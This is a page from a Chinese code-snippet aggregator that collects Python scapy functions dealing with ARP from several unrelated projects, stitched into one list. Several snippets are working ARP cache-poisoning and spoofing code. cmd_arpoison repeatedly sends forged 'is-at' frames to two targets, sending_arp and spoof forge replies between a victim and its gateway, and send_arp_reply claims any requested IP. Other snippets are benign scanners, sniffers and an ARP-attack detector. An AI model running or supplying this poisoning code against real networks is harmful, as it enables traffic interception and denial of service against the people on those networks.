def send_arp_reply(request):
    """Answer a broadcast ARP request by claiming the requested IP address.

    A reply is sent only when ``request`` carries an ARP layer with op 1
    (request), its Ethernet destination is the broadcast address and its ARP
    target hardware address is all zeros. The reply advertises
    ``_current_mac_address`` as the owner of the requested IP and is sent
    back to the requester through a raw ``AF_PACKET`` socket bound to
    ``_current_network_interface``.

    Each reply increments ``_current_number_of_packets``; once it reaches
    ``_number_of_packets`` the process exits with status 0.

    :param request: captured packet (indexed with the scapy ``ARP`` and
        ``Ether`` layers).
    """
    global _current_number_of_packets

    if not request.haslayer(ARP):
        return
    if request[ARP].op != 1:
        return
    if not (request[Ether].dst == "ff:ff:ff:ff:ff:ff"
            and request[ARP].hwdst == "00:00:00:00:00:00"):
        return

    # Single parenthesised argument: valid as a Python 2 print statement and
    # as a Python 3 print() call.
    print(Base.c_info + "ARP request from MAC: " + request[ARP].hwsrc + " IP: " + request[ARP].pdst)

    reply = _arp.make_response(ethernet_src_mac=_current_mac_address,
                               ethernet_dst_mac=request[ARP].hwsrc,
                               sender_mac=_current_mac_address, sender_ip=request[ARP].pdst,
                               target_mac=request[ARP].hwsrc, target_ip=request[ARP].psrc)

    # The socket is opened only when there is something to send and is always
    # closed afterwards, so handling many packets does not leak descriptors.
    sock = socket(AF_PACKET, SOCK_RAW)
    try:
        sock.bind((_current_network_interface, 0))
        sock.send(reply)
    finally:
        sock.close()

    _current_number_of_packets += 1
    if _current_number_of_packets >= _number_of_packets:
        exit(0)
python类ARP的实例源码
network_conflict_creator.py 文件源码
项目:raw-packet
作者: Vladimir-Ivanov-Git
项目源码
文件源码
阅读 31
收藏 0
点赞 0
评论 0
def mac_getter(self, IP):
    """Return the Ethernet source address of the first ARP answer for ``IP``.

    A broadcast ARP request for ``IP`` is sent on ``self.interface`` (2 s
    timeout, 0.2 s between packets). Returns ``None`` when nothing answers.
    """
    arp_request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=IP)
    answered, _unanswered = srp(arp_request, timeout=2, iface=self.interface, inter=0.2)
    for _sent, received in answered:
        # Only the first answer is used.
        return received.sprintf(r"%Ether.src%")
    return None
def ARPing(self):
    """Re-announce the looked-up MAC addresses, disable forwarding and exit.

    Sends ten ARP replies (op 2) to the victim carrying the gateway's MAC and
    ten to the gateway carrying the victim's MAC, both addressed to the
    broadcast hardware address, then writes 0 to the kernel's IPv4
    ``ip_forward`` switch and terminates the process.
    """
    victim_mac = self.mac_getter(self.victimIP)
    gateway_mac = self.mac_getter(self.gatewayIP)

    # (destination IP, advertised IP, advertised MAC) for each direction.
    announcements = (
        (self.victimIP, self.gatewayIP, gateway_mac),
        (self.gatewayIP, self.victimIP, victim_mac),
    )
    for dest_ip, advertised_ip, advertised_mac in announcements:
        send(ARP(op=2, pdst=dest_ip, psrc=advertised_ip,
                 hwdst="ff:ff:ff:ff:ff:ff", hwsrc=advertised_mac), count=10)

    # Turn IP forwarding back off.
    os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
    exit()
def sending_arp(self):
    """Send one spoofed ARP reply to the victim and one to the gateway.

    The victim is told the gateway's IP and the gateway is told the victim's
    IP; no ``hwsrc`` is given, so scapy fills in the sender hardware address.
    """
    victim_mac = self.mac_getter(self.victimIP)
    gateway_mac = self.mac_getter(self.gatewayIP)

    # (destination IP, spoofed source IP, destination MAC) for each direction.
    for dest_ip, spoofed_ip, dest_mac in (
        (self.victimIP, self.gatewayIP, victim_mac),
        (self.gatewayIP, self.victimIP, gateway_mac),
    ):
        send(ARP(op=2, pdst=dest_ip, psrc=spoofed_ip, hwdst=dest_mac))
def procpkt(pkt):
    """Record the sender of an ARP packet in ``hosts`` and redraw the table.

    For a packet containing ARP, the entry keyed by the sender IP is replaced
    with its hardware address, the vendor comment from ``mac2vendor`` and the
    current time. The screen is then cleared and one tab-separated row per
    known host is printed: seconds since last seen, IP, MAC, vendor.

    NOTE(review): source indentation was lost; the redraw is assumed to sit
    inside the ARP guard.
    """
    now = time()
    if 'ARP' not in pkt:
        return

    # Bind the fresh dict to both names, then fill it field by field.
    entry = hosts[pkt[ARP].psrc] = {}
    entry['hwaddr'] = pkt[ARP].hwsrc
    entry['vendor'] = mac2vendor.get_comment(pkt[ARP].hwsrc)
    entry['time'] = time()

    click.clear()

    row = '{seconds}\t{ip}\t{hwaddr}\t{vendor}'
    for ip in sorted(hosts):
        host = hosts[ip]
        print(row.format(
            seconds=int(now - host['time']),
            ip=ip,
            hwaddr=host['hwaddr'],
            vendor=host['vendor'],
        ))
def get_mac(iface, ip):
    """Resolve the MAC address for ``ip`` on ``iface`` via ARP.

    A broadcast ARP request for ``ip`` is sent first (10 s timeout). If
    nothing answers, the request is repeated for the gateway address found
    for ``iface`` in the table returned by ``gateways()``.

    :param iface: name of the network interface to send on.
    :param ip: IP address to resolve.
    :return: the answering host's hardware address as a string, or
        ``"ff:ff:ff:ff:ff:ff"`` when neither lookup succeeds.
    """
    broadcast = "ff:ff:ff:ff:ff:ff"

    # Find the gateway IP associated with ``iface``.
    # NOTE(review): the entry layout differs between keys; the IndexError
    # fallback is kept exactly as it was -- confirm against gateways().
    gw_ip = ""
    gws = gateways()
    for gw in gws:
        try:
            if str(gws[gw][AF_INET][1]) == iface:
                gw_ip = str(gws[gw][AF_INET][0])
        except IndexError:
            if str(gws[gw][0][1]) == iface:
                gw_ip = str(gws[gw][0][0])

    try:
        alive, _dead = srp(Ether(dst=broadcast) / ARP(pdst=ip), iface=iface, timeout=10, verbose=0)
        return str(alive[0][1].hwsrc)
    except IndexError:
        # No answer for ``ip``: fall through and ask for the gateway instead.
        pass
    except Exception:
        # ``Exception`` rather than a bare except, so Ctrl-C and SystemExit
        # are not silently turned into a broadcast address.
        return broadcast

    try:
        alive, _dead = srp(Ether(dst=broadcast) / ARP(pdst=gw_ip), iface=iface, timeout=10, verbose=0)
        return str(alive[0][1].hwsrc)
    except Exception:
        return broadcast
def scapy_mon_arp_callback(pkt):
    """CALLBACK: Monitor ARP table on all interfaces.

    Tracks the sender MAC -> sender IP pairs seen in ARP requests and replies
    (op 1 or 2) in the module-level ``seen_arp`` dict. A MAC seen for the
    first time is recorded and reported. If a known MAC shows up with a
    different IP, a warning is printed, the callback sleeps for 10 seconds
    and ``seen_arp`` is reset to an empty dict.
    """
    global seen_arp

    if ARP not in pkt or pkt[ARP].op not in (1, 2):
        return

    mac = pkt[ARP].hwsrc
    ip = pkt[ARP].psrc

    if mac not in seen_arp:
        seen_arp[mac] = ip
        print(bc.OKGREEN + '\tAdding: ' + mac + ' - ' + ip)
        return

    # Direct lookup: the key is already known, so no scan of the dict is needed.
    known_ip = seen_arp[mac]
    if known_ip != ip:
        print(bc.WARN + '\tWARNING - POSSIBLE ARP-ATTACK!')
        print(bc.WARN + '\tDuplicated mac address found: ' + mac + ' != ' + known_ip)
        print('')
        print('\tThe ARP data will be deleted within 10 seconds. If this warning persists, you are under attack!')
        sleep(10)
        seen_arp = {}
def restore(self, index):
    """Stop tracking a device and re-announce the real ARP mappings.

    Looks up the device's IP and MAC at ``self._devices[index]``, removes
    that entry, then sends four ARP replies to the device carrying the
    router's IP/MAC and four to the router carrying the device's IP/MAC.
    Any failure is logged rather than raised.

    :param index: position of the device in ``self._devices``.
    """
    # Pre-bind so the error log below cannot itself fail with an unbound
    # name when the device lookup is what raised.
    victim_ip = None
    try:
        device = self._devices[index]
        victim_ip = device[0]
        victim_mac = device[1]
        _LOGGER.info("Enabling internet for device IP: %s MAC: %s",
                     victim_ip, victim_mac)
        del self._devices[index]
        send(ARP(op=2, pdst=victim_ip, hwdst=victim_mac, psrc=self._router_ip,
                 hwsrc=self._router_mac), count=4, iface=self._interface, verbose=False)
        send(ARP(op=2, pdst=self._router_ip, hwdst=self._router_mac, psrc=victim_ip,
                 hwsrc=victim_mac), count=4, iface=self._interface, verbose=False)
    except Exception:
        # ``Exception`` instead of a bare except: KeyboardInterrupt and
        # SystemExit still propagate.
        _LOGGER.error("Error when restoring IP: %s", victim_ip)
def get_arp_op(self, buff):
    """Parse ``buff`` as an Ethernet frame and map its ARP op code.

    Returns the ``constants.ARP_OP_TYPE`` entry for the frame's ARP ``op``.
    """
    op_code = scapy.Ether(buff)[scapy.ARP].op
    return constants.ARP_OP_TYPE[op_code]
def cmd_arpsniff(iface):
    """ ARP Sniffer """
    # Silence scapy, then select the interface if the caller named one.
    conf.verb = False
    if iface:
        conf.iface = iface

    # Hand every captured ARP packet to procpkt; nothing is kept in memory.
    sniff(prn=procpkt, filter="arp", store=False)
def cmd_arpoison(t1, t2, iface, verbose):
    """ARP cache poison"""
    # Silence scapy, then select the interface if the caller named one.
    conf.verb = False
    if iface:
        conf.iface = iface

    mac1 = getmacbyip(t1)
    mac2 = getmacbyip(t2)

    # One "is-at" frame per target, each presenting the other target's IP.
    frames = (
        Ether(dst=mac1) / ARP(op="is-at", psrc=t2, pdst=t1, hwdst=mac1),
        Ether(dst=mac2) / ARP(op="is-at", psrc=t1, pdst=t2, hwdst=mac2),
    )

    # Resend both frames once per second until interrupted with Ctrl-C.
    try:
        while True:
            for frame in frames:
                sendp(frame)
            for frame in frames:
                if verbose:
                    frame.show2()
                else:
                    print(frame.summary())
            time.sleep(1)
    except KeyboardInterrupt:
        pass
def make_arp_reply_packet():
    """Build the Ethernet/ARP frame from ``sender_mac_address`` and ``args``.

    The frame goes from ``sender_mac_address`` to ``args.target_mac`` and
    carries ``args.sender_ip`` / ``args.target_ip`` as the ARP protocol
    addresses.
    """
    # NOTE(review): no ARP ``op`` is set here, so the ARP layer's default
    # applies -- confirm that is the intended operation for a "reply".
    ethernet = Ether(src=sender_mac_address, dst=args.target_mac)
    arp = ARP(hwsrc=sender_mac_address, psrc=args.sender_ip,
              hwdst=args.target_mac, pdst=args.target_ip)
    return ethernet / arp
def scapy_mon_arp():
    """Monitor ARP table on all interfaces.

    Sniffs ARP traffic, passing each packet to ``scapy_mon_arp_callback``
    without storing it, and returns whatever ``sniff`` returns.
    """
    return sniff(filter="arp", store=0, prn=scapy_mon_arp_callback)
def ping_host(self, ip):
    """Send an ICMP/ARP request to ``ip`` and report whether it answered.

    :param ip: address of the host to probe.
    :return: tuple ``(host, ONLINE, response_time)`` when an answer was
        received, otherwise ``(host, OFFLINE, None)``. ``host`` is the
        resolved host name when name resolution is enabled and succeeds,
        else ``ip``. ``response_time`` is the difference between the
        response's ``time`` and the request's ``sent_time`` (not rounded).
    :raises PermissionException: when sending fails with ``PermissionError``.
    """
    # Form an ICMP or ARP packet.
    packet = self.__gen_packet(ip)
    try:
        # Send and wait for the response; only the answered list is needed.
        answers, _unanswers = self.__send_recv(packet)
    except PermissionError:
        raise PermissionException

    host = ip
    if self.__resolve_names:
        # Resolve the host name from the IP; fall back to the IP on failure.
        try:
            host = gethostbyaddr(ip)[HOST_NAME_INDEX]
        except herror:
            host = ip

    if not answers:
        # Nothing answered. The unanswered list is deliberately not indexed:
        # its contents were never used and indexing it could raise.
        return host, OFFLINE, None

    answer = answers[FIRST_INDEX]
    req = answer[REQUEST_INDEX]
    resp = answer[RESPONSE_INDEX]
    delta = resp.time - req.sent_time
    return host, ONLINE, delta
def is_device_connected(mac_addr):
    """Return True if a host answering an ARP sweep of ``SUBNET`` has ``mac_addr``.

    A broadcast ARP request for ``SUBNET`` is sent with a 2 s timeout and the
    source address of each answer is compared with ``mac_addr``.
    """
    probe = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") / scapy.ARP(pdst=SUBNET)
    answered, _unanswered = scapy.srp(probe, timeout=2)
    return any(reply.src == mac_addr for _sent, reply in answered)
def arping(mac, ip, timeout):
    """Send ARP requests for ``ip`` to ``mac`` until one is answered.

    ``timeout // 2`` attempts are made, each waiting up to 2 seconds.

    :param mac: Ethernet destination address for the request.
    :param ip: IP address (or network) placed in the ARP ``pdst`` field.
    :param timeout: overall time budget in seconds.
    :return: the first answer returned by ``srp1``, or ``None`` when nothing
        answered or ``timeout`` is too small for a single attempt.
    """
    # Pre-bind so a zero-attempt loop returns None instead of raising.
    ans = None
    # Floor division keeps the attempt count an integer on Python 3 as well.
    for _attempt in range(int(timeout // 2)):
        ans = srp1(Ether(dst=mac) / ARP(pdst=ip), timeout=2, verbose=0)
        if ans:
            break
    return ans
def update_cache(self):
    """Rebuild ``self._arp_cache`` from an ARP sweep of the router's /24.

    Each answer contributes ``[sender IP, lower-cased Ethernet source]``.
    Failures are logged and not raised.

    NOTE(review): source indentation was lost; the debug log is assumed to
    run whether or not anything answered.
    """
    try:
        network = self._router_ip + "/24"
        answered, _unanswered = arping(network, iface=self._interface, verbose=False)

        # Install the new list first, then fill it entry by entry.
        cache = self._arp_cache = []
        for _sent, reply in (answered or ()):
            cache.append([reply[ARP].psrc, reply[Ether].src.lower()])

        _LOGGER.debug("ARP cache: %s", self._arp_cache)
    except Exception as e:
        _LOGGER.error("Error when trying update ARP cache: %s", str(e))
def spoof(self, index):
    """Send spoofed ARP replies between a tracked device and the router.

    Looks up the device's IP and MAC at ``self._devices[index]`` and sends
    one ARP reply to the device presenting the router's IP and one to the
    router presenting the device's IP. No ``hwsrc`` is given, so scapy fills
    in the sender hardware address. Failures are logged and not raised.

    :param index: position of the device in ``self._devices``.
    """
    # Pre-bind so the error log below cannot itself fail with an unbound
    # name when the device lookup is what raised.
    victim_ip = None
    victim_mac = None
    try:
        device = self._devices[index]
        victim_ip = device[0]
        victim_mac = device[1]
        send(ARP(op=2, pdst=victim_ip, psrc=self._router_ip,
                 hwdst=victim_mac), iface=self._interface, verbose=False)
        send(ARP(op=2, pdst=self._router_ip, psrc=victim_ip,
                 hwdst=self._router_mac), iface=self._interface, verbose=False)
    except Exception:
        # ``Exception`` instead of a bare except: KeyboardInterrupt and
        # SystemExit still propagate.
        _LOGGER.error("Error when trying to spoof device IP: %s MAC: %s",
                      victim_ip, victim_mac)
def cmd_arping(ip, iface, verbose):
    # Broadcast an ARP request for ``ip`` and display the answers received
    # within two seconds.
    if verbose:
        logging.basicConfig(format='%(message)s', level=logging.INFO)

    # Silence scapy, then select the interface if the caller named one.
    conf.verb = False
    if iface:
        conf.iface = iface

    arp_request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip)
    answered, _unanswered = srp(arp_request, timeout=2)
    answered.show()